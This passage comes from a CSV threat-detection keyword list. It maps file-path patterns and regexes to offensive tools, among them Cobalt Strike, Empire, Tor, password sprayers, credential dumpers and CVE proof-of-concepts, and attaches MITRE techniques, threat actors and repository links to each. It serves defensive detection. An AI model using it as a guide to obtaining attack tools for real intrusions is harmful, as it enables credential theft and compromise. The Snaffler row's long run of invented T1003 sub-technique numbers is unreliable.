APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","32","6","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" 
"*/TokenTactics.git*",".{0,1000}\/TokenTactics\.git.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*/TokenUniverse.git*",".{0,1000}\/TokenUniverse\.git.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*/TokenUniverse.zip*",".{0,1000}\/TokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*/Tokenvator/*",".{0,1000}\/Tokenvator\/.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*/tomcat-RH-root.sh*",".{0,1000}\/tomcat\-RH\-root\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/tools/BeaconTool/*",".{0,1000}\/tools\/BeaconTool\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice 
Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/tools/DHCP.py*",".{0,1000}\/tools\/DHCP\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/tools/psexec.rb*",".{0,1000}\/tools\/psexec\.rb.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Tools/ResHacker.exe*",".{0,1000}\/Tools\/ResHacker\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","false positive risk","6","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Tools/spoolsystem/*",".{0,1000}\/Tools\/spoolsystem\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Tools/Squeak/Squeak*",".{0,1000}\/Tools\/Squeak\/Squeak.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/toolsdownload/iepv.zip*",".{0,1000}\/toolsdownload\/iepv\.zip.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/toolsdownload/rdpv.zip*",".{0,1000}\/toolsdownload\/rdpv\.zip.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/Tool-X.git*",".{0,1000}\/Tool\-X\.git.{0,1000}","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. 
Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/top_mots_combo.7z*",".{0,1000}\/top_mots_combo\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*/top-usernames-shortlist.txt*",".{0,1000}\/top\-usernames\-shortlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/tor -mindepth 1 -maxdepth 1 -type f *",".{0,1000}\/tor\s\-mindepth\s1\s\-maxdepth\s1\s\-type\sf\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/tor/torrc*",".{0,1000}\/tor\/torrc.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/tor-0.*.tar.gz*",".{0,1000}\/tor\-0\..{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Tor2web-*.tar.gz*",".{0,1000}\/Tor2web\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/Tor2web-*.zip*",".{0,1000}\/Tor2web\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/tor2web.conf*",".{0,1000}\/tor2web\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/Tor2web.git*",".{0,1000}\/Tor2web\.git.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to 
Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/tor2web.js*",".{0,1000}\/tor2web\.js.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/tor-archive-keyring*",".{0,1000}\/tor\-archive\-keyring.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/ToRat.git*",".{0,1000}\/ToRat\.git.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/torbrowser-install-*.exe *",".{0,1000}\/torbrowser\-install\-.{0,1000}\.exe\s\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/tor-browser-linux*.*",".{0,1000}\/tor\-browser\-linux.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/tor-browser-osx64*.*",".{0,1000}\/tor\-browser\-osx64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/tor-browser-win32*.*",".{0,1000}\/tor\-browser\-win32.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/tor-browser-win64*.*",".{0,1000}\/tor\-browser\-win64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/tor-consensus-checker.nse*",".{0,1000}\/tor\-consensus\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tor-gencert.exe*",".{0,1000}\/tor\-gencert\.exe.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/tor-geoipdb.list*",".{0,1000}\/tor\-geoipdb\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/tor-package-archive/*",".{0,1000}\/tor\-package\-archive\/.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/torsocks.conf",".{0,1000}\/torsocks\.conf","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/torsocks.list*",".{0,1000}\/torsocks\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/tor-static-windows-amd64.zip*",".{0,1000}\/tor\-static\-windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/toteslegit.ps1*",".{0,1000}\/toteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/traceroute-geolocation.nse*",".{0,1000}\/traceroute\-geolocation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tracers_fuzzer.cc*",".{0,1000}\/tracers_fuzzer\.cc.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/trackerjacker*",".{0,1000}\/trackerjacker.{0,1000}","offensive_tool_keyword","trackerjacker","Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.","T1040 - T1018 - T1591","TA0007 - - TA0043","N/A","N/A","Information Gathering","https://github.com/calebmadrigal/trackerjacker","1","0","N/A","N/A","10","2572","189","2024-01-16T05:10:22Z","2016-12-18T22:01:13Z" "*/Trackflaw/CVE*.py*",".{0,1000}\/Trackflaw\/CVE.{0,1000}\.py.{0,1000}","offensive_tool_keyword","poc","Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tools","https://github.com/Trackflaw/CVE-2023-23397","1","1","N/A","N/A","2","115","25","2023-03-24T10:46:38Z","2023-03-20T16:31:54Z" "*/transports/scramblesuit/*.py*",".{0,1000}\/transports\/scramblesuit\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/trap_command.py*",".{0,1000}\/trap_command\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/TreeWalker.cs*",".{0,1000}\/TreeWalker\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - 
T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/TREVORspray.git*",".{0,1000}\/TREVORspray\.git.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*/trevorspray.log*",".{0,1000}\/trevorspray\.log.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*/trganda/CVE-2022-23131*",".{0,1000}\/trganda\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication 
bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" "*/trick_ryuk.profile*",".{0,1000}\/trick_ryuk\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/trickbot.profile*",".{0,1000}\/trickbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 